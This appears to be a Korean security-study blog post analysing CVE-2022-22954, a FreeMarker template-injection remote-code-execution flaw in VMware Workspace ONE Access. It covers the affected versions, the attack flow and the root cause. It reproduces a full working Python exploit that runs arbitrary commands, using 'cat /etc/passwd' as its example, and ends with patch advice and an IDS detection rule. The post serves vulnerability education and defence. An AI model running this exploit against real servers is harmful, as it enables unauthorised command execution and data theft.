꼰머의 보안공부

1. VMware 

- 클라우드 컴퓨팅 및 가상화 소프트웨어를 판매하는 기업

1.1 Workspace ONE

- 액세스 제어, 애플리케이션 관리 및 멀티 플랫폼 Endpoint 관리를 통합하여 기기에 관계없이 모든 애플리케이션을 제공하고 관리할 수 있는 디지털 워크스페이스 플랫폼

1.2 Identity Manager

- Workspace ONE의 ID 및 액세스 관리 구성 요소

2. 취약점

- VMware Workspace ONE Access 및 Identity Manager에서 발생하는 원격 코드 실행 취약성 (CWSS 9.8)

- 네트워크 액세스 권한이 있는 위협 행위자가 RCE를 유발하는 서버 측 템플릿 주입을 트리거할 가능성 有

영향받는 버전
- VMware Workspace ONE Access 20.10.0.0 – 20.10.0.1, 21.08.0.0 – 21.08.0.1
- vIDM(VMware Identity Manager) 3.3.3 – 3.3.6

2.1 공격 흐름

① 공격자는 해당 취약점을 악용하여 초기 접근 권한을 얻음

② 취약한 서비스에서 스테이저를 실행하는 PowerShell 명령 실행

※ 스테이저(Stager) : C2 등 외부에서 쉘코드를 다운받아 메모리상에서 실행시켜주는 쉘코드

③ C2서버 접근

2.2 분석

- 해당 취약점은 customError.ftl 템플릿에서 발생

- 안전하지 않은 freemarker 구문, 특히 신뢰할 수 없는 입력에 대한 eval 호출의 사용으로 인해 발생

2.3 PoC

- /catalog-portal/ui/oauth/verify?error=&deviceUdid= URL 요청

- deviceUdid 매개변수 값을 조작

"""
CVE-2022-22954 PoC - VMware Workspace ONE Access Freemarker Server-Side Template Injection
[+] Github:
https://github.com/DrorDvash/CVE-2022-22954_VMware_PoC
[+] Usage:
python3 CVE-2022-22954.py example.com "cat /etc/passwd"
"""

import sys
import requests

usage = '[+] Usage: python3 {} example.com "cat /etc/passwd"\n'.format(sys.argv[0])

if ("-h" in sys.argv[1]) or (len(sys.argv) < 1):
	print("\n" + usage)
	exit()


def execute():
	try:
		# Check if user input includes "http://" or "https://"
		if "://" in sys.argv[1]:
			domain = sys.argv[1]
		else:
			domain = "https://" + sys.argv[1]

		# Build URL
		base_uri = "/catalog-portal/ui/oauth/verify?error=&deviceUdid="
		payload = "${{\"freemarker.template.utility.Execute\"?new()(\"{}\")}}".format(sys.argv[2])
		final_url = domain + base_uri + url_encode_all(payload)

		# Send payload
		r = requests.get(final_url)

		# Handle response output - get the desired data
		from_output = r.text.find(': workspace, device id:')
		to_output = r.text.find(', device type:')

		# Print output
		if from_output != -1:
			print("#PoC URL:", final_url, "\n")
			print("[+] Output:\n----------")
			output = r.text[from_output+24:to_output]
			for line in output.split('\\n'):
				print(line)
		else:
			print("[!] Target is not vulnerable.")
	except:
		print('[!] ERROR!\n{}'.format(usage))
		exit()


def url_encode_all(string):
	return "".join("%{0:0>2}".format(format(ord(char), "x")) for char in string)


execute()

- 위 PoC를 통한 패킷을 확인해보면 아래와 같음.

3. 대응방안

3.1 서버측면

- 벤더사에서 발표한 보안 권고를 참고하여 최신 버전으로 업데이트

3.2 네트워크 측면

- 공개된 PoC를 통해 탐지 정책(/catalog-portal/ui/oauth/verify?error=&deviceUdid=) 설정 및 적용

alert tcp $EXTERNAL_NET any -> $HOME_NET any(msg:"CVE-2022-22954 GET Observed"; \ flow:to_server, established; \ content:"GET"; http_method; \ content:"catalog|2d|portal|2f|ui|2f|oauth|2f|verify|3f|error|3d 26|deviceUdid|3d|"; http.uri; \ priority:2; \ metadata: Not tested for FP rate or accuracy; \ reference:url,https://www.rapid7.com/blog/post/2022/04/29/widespread-exploitation-of-vmware-workspace-one-access-cve-2022-22954/,CVE-2022-22954; \ sid:1000012; rev:1;) \

4. 참고

- https://srcincite.io/advisories/src-2022-0005/

- https://www.vmware.com/kr/products/workspace-one.html

- https://cloud.tencent.com/developer/article/2087159

- https://wins21.co.kr/kor/promotion/information.html?bmain=view&uid=3062&search=%26depth1%3D%26find_field%3Dtitle%26find_word%3DCVE-2022-22954%26page%3D1 

- https://nvd.nist.gov/vuln/detail/cve-2022-22954

- https://github.com/DrorDvash/CVE-2022-22954_VMware_PoC

- https://www.boannews.com/media/view.asp?idx=106896 

- https://krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=66633

- https://www.vmware.com/security/advisories/VMSA-2022-0011.html

- https://kb.vmware.com/s/article/88099

- https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis

- https://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/

- https://packetstormsecurity.com/files/166935/VMware-Workspace-ONE-Access-Template-Injection-Command-Execution.html